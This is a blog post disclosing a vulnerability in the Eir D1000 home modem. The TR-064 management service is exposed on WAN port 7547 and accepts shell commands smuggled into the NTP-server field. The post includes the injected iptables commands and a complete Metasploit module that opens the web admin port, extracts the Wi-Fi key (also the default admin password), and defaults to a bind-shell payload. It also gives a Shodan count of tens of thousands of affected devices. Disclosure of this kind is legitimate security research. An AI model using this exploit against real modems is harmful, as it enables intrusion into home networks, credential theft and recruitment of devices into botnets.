Eir’s D1000 Modem Is Wide Open To Being Hacked.

Background

The Eir D1000 Modem has bugs that allow an attacker to gain full control of the modem from the Internet. The modem could then be used to hack into internal computers on the network, as a proxy host to hack other
computers or even as a bot in a botnet.

A port scan of the the modem revealed that it has one TCP port exposed to the Internet, port 7547. Port 7547 is running as part of the TR-069 protocol. TR-069 a.k.a CPE WAN Management Protocol a.k.a. CWMP is a protocol that ISPs like Eir use to manage all of the modems on their network.

When Eir’s technical support want to manage the modem – maybe to reset the Wi-Fi password, they instruct the ACS (Access Control Server – the server used to manage the modems) to connect to the modem on port 7547 and send it a “connection request” command. The modem then connects to the ACS and Eir’s technical support can change whatever settings they want.

What is not very well known is that the server on port 7457 is also a TR-064 server.
This is another protocol related to TR-069. It is also known as “LAN-Side CPE Configuration”. The idea behind this protocol is to allow the ISP to configure the modem from installation software supplied with the modem. The protocol is not supposed to be accessed from the WAN side of the modem but in the D1000 modem, we can send TR-064 commands to port 7547 on the WAN side. This allows us to “configure” the modem from the Internet.

There are many TR-064 commands, some useful ones are:

DeviceInfo/GetInfo:
 This gives general information about the modem including serial number, 
 firmware version, device description etc...

WLANConfiguration/GetSecurityKeys:
 This returns the Wi-Fi key

WLANConfiguration/GetInfo:
 This returns the SSID and MAC address

Time/SetNTPServers:
 This is the pièce de résistance. We can exploit this command to run
 busybox shell commands on the modem. e.g. setting the NTP server to
 "`iptables -F INPUT`" turns off the firewall on the modem which in 
 turn allows access to the administration interface on port 80.

Proof Of Concept Exploit

By sending certain TR-064 commands, we can instruct the modem to open port 80 on the firewall. This allows access the the web administration interface from the Internet facing side of the modem. The default login password for the D1000 is the Wi-Fi password. This is easily obtained with another TR-064 command.

Here’s a Metasploit module :


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Eir D1000 Modem CWMP Exploit POC',
      'Description' => %q{
        This exploit drops the firewall to allow access to the web administration interface on port 80 and
	it also retrieves the wifi password. The default login password to the web interface is the default wifi
        password. This exploit was tested on firmware versions up to 2.00(AADU.5)_20150909.
      },
      'Author'      =>
        [
          'Kenzo', # Vulnerability discovery and Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'DisclosureDate' => 'Nov 07 2016',
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'linux/mipsbe/shell_bind_tcp'
        },
      'Targets' =>
        [
          [ 'MIPS Little Endian',
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPSLE
            }
          ],
          [ 'MIPS Big Endian',
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPSBE
            }
          ],
        ],
      'DefaultTarget'    => 1
      ))

    register_options(
      [
        Opt::RPORT(7547), # CWMP port
      ], self.class)

  @data_cmd_template = "<?xml version=\"1.0\"?>"
  @data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
  @data_cmd_template << " <SOAP-ENV:Body>"
  @data_cmd_template << "  <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
  @data_cmd_template << "   <NewNTPServer1>%s</NewNTPServer1>"
  @data_cmd_template << "   <NewNTPServer2></NewNTPServer2>"
  @data_cmd_template << "   <NewNTPServer3></NewNTPServer3>"
  @data_cmd_template << "   <NewNTPServer4></NewNTPServer4>"
  @data_cmd_template << "   <NewNTPServer5></NewNTPServer5>"
  @data_cmd_template << "  </u:SetNTPServers>"
  @data_cmd_template << " </SOAP-ENV:Body>"
  @data_cmd_template << "</SOAP-ENV:Envelope>"
  end

  def check
    begin
      res = send_request_cgi({
        'uri' => '/globe'
      })
    rescue ::Rex::ConnectionError
      vprint_error("A connection error has occured")
      return Exploit::CheckCode::Unknown
    end

    if res and res.code == 404 and res.body =~ /home_wan.htm/
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Trying to access the device...")

    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
    end

    print_status("Exploiting...")
    print_status("Dropping firewall on port 80...")
    execute_command("`iptables -I INPUT -p tcp --dport 80 -j ACCEPT`","")
    key = get_wifi_key()
    print_status("WiFi key is #{key}")
    execute_command("tick.eircom.net","")
  end

  def execute_command(cmd, opts)
    uri = '/UD/act?1'
    soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
    data_cmd = @data_cmd_template % "#{cmd}"
    begin
      res = send_request_cgi({
        'uri'    => uri,
        'ctype' => "text/xml",
        'method' => 'POST',
        'headers' => {
          'SOAPAction' => soapaction,
          },
        'data' => data_cmd
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end

  def get_wifi_key()
    print_status("Getting the wifi key...")
    uri = '/UD/act?1'
    soapaction = "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"
    data_cmd_template = "<?xml version=\"1.0\"?>"
    data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
    data_cmd_template << " <SOAP-ENV:Body>"
    data_cmd_template << "  <u:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\">"
    data_cmd_template << "  </u:GetSecurityKeys>"
    data_cmd_template << " </SOAP-ENV:Body>"
    data_cmd_template << "</SOAP-ENV:Envelope>"
    data_cmd= data_cmd_template

    begin
      res = send_request_cgi({
        'uri'    => uri,
        'ctype' => "text/xml",
        'method' => 'POST',
        'headers' => {
          'SOAPAction' => soapaction,
          },
        'data' => data_cmd
      })

      /NewPreSharedKey>(?<key>.*)<\/NewPreSharedKey/ =~ res.body
      return key
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end

Precautions Eir Could Have Taken To Make The Modem More Secure

  1. Back in the days when Eir were Eircom and they used Netopia modems, port 7547 was blocked to every IP address except those assigned to Eir’s management servers. This meant even though the Netopia modems had bugs, they could not be exploited. Inexplicably, Eir do not do this for their newer modems. If they did, these bugs would not have been exploitable.
  2. They could have started a bug bounty program. This would have created an incentive for security researchers to look for flaws in Eir’s modems.

Other Points Of Interest

  • This is not the only bug in this software, there are others. It was not even the first, previous firmware versions were also vulnerable to CVE-2014-9222, the “Misfortune Cookie” bug. Eir quietly patched that bug in firmware version “2.00(AADU.5)D0.”, sometime in early 2015.
  • There are also a few thousand Eir modems being used on other ISP networks (mainly Vodafone). These are no longer being managed by Eir therefore any firmware updates will not be applied to these and it is likely that they will remain vulnerable to this exploit even if Eir update the firmware to fix these bugs.
  • Another of Eir’s modems, the “P-660HN-T1A_IPv6” is vulnerable to the same bugs.
  • Currently Shodan.io, the “Internet of Things” search engine shows that they are about 66,000 modems affected by this bug. Previously, it showed it to be around 100,000. Click here to search Shodan.io (you need to have an account there)

Further Reading

https://www.broadband-forum.org/technical/download/TR-064.pdf
https://www.broadband-forum.org/technical/download/TR-069.pdf

Advertisements

83 thoughts on “Eir’s D1000 Modem Is Wide Open To Being Hacked.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s